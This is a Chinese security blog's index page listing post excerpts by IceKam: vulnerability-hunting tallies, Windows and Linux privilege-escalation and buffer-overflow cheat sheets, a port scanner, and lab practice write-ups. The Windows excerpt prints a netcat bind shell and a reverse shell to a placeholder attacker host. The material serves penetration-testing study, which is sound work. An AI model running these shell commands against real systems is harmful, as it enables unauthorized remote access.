2021年上半年漏洞挖掘成果
· ☕ 1 分钟 · ✍️ IceKam
前言: 上半年成功溜了,无聊的时候挖了一点儿漏洞,都是年初的时候挖的。 近期略忙碌,先写上有空再挖点。 原创漏洞证明 CNVD-YCGI-20211206**** CNVD-YCGW-20210105**** CNVD-YCGN-20210108**** CNVD-YCGN-20210108**** CNVD-YCGW-20210204**** CNVD-YCGA-20210204**** CNVD-YCGW-20210206**** CNVD-YCGW-20210302**** 总结 无聊时候你

2020年度漏洞挖掘的一些成果
· ☕ 1 分钟 · ✍️ IceKam
前言: 2020年花了点时间,刷了点儿漏洞。 CNVD 原创漏洞证书 CNVD-YCGW-2020090***** CNVD-YCGW-2020110***** CNVD-YCGW-2020110***** CNVD-YCGN-2020110***** CNVD-YCGN-2020110***** CNVD-YCGI-2020120***** CNVD-YCGA-2020120***** CNVD-YCGW-2020120***** 编号 有个几十个,有十多个的通用。 CVE CVE-2020-28091 CVE-2020-28092 CVE-2020-35437 纯水。 心得 CNVD更改了证书

2020 深刻难忘
· ☕ 2 分钟 · ✍️ IceKam
前言: 2020年还有一个星期就结束了,做个年度总结纪念这平凡而不平凡的一年。 技术方面 渗透测试 工作上支撑有关部门,输出了十几个高危漏洞,基本都

Windows 提权 备忘录
· ☕ 8 分钟 · ✍️ IceKam
从RCE到Shell 在有限的解释器中获取shell: $ system("start cmd.exe /k $cmd") 将cmd绑定到端口: $ nc.exe -Lp 31337 -vv -e cmd.exe Reverse shell: $ nc.exe attacker_ip attacker_port -e cmd.exe 0:系统信息 查找已安装的软件

网络端口快速扫描脚本
· ☕ 1 分钟 · ✍️ IceKam
前言 最近有个朋友需求要一个快速扫描器。 开始想用nmap后来感觉还是太慢了。 想了想还是造了个小轮子。 环境 系统:MacOS / Linux 工具:massca

缓冲区溢出 备忘录
· ☕ 4 分钟 · ✍️ IceKam
简介 这是一个缓冲区溢出 的备忘录,涵盖了常用姿势。 身份识别 第一步是识别漏洞。您可以调试该应用并使用较大的字符串对其进行模糊处理,并确定导致崩溃

Linux 渗透测试 提权 备忘录
· ☕ 4 分钟 · ✍️ IceKam
简介 这是一个Linux 提取的备忘录,涵盖了大部分常用姿势,本文为原创作品。 获得shell后 获得交互 Shell 1 $ python -c 'import pty;pty.spawn("/bin/bash")' 如果失败可设置PATH TER

Ehtools Wifi 渗透测试框架
· ☕ 1 分钟 · ✍️ IceKam
简介 Wi-Fi工具不断为初学者和Ehtools框架提供越来越多的访问权限。 是认真渗透工具的框架,可以从其中轻松进行探索。 这个强大而简单的工具

Active 练习记录
· ☕ 2 分钟 · ✍️ IceKam
环境介绍: 名称:Active 系统:Windows 信息搜集 获取目标 1 $ nmap -A 10.10.10.100 系统为Windows Server,端口53、88、135、139、

Bastion 练习记录
· ☕ 3 分钟 · ✍️ IceKam
环境介绍: 名称:Bastion 系统:Windows 信息搜集 获取目标 1 $ nmap -A 10.10.10.134 系统为Windows Server,端口22、135、139、44

Access 练习记录
· ☕ 4 分钟 · ✍️ IceKam
环境介绍: 名称:Access 系统:Windows 信息搜集 获取目标 1 $ nmap -A 10.10.10.93 系统为Windows Server 2008 R2 - 2012,端口21、80、telnet

Netmon 练习记录
· ☕ 3 分钟 · ✍️ IceKam
环境介绍: 名称:Netmon 系统:Windows 信息搜集 获取目标 1 $ nmap -A 10.10.10.93 系统为Windows Server 2008 R2 - 2012,端口21、80开放,部署有P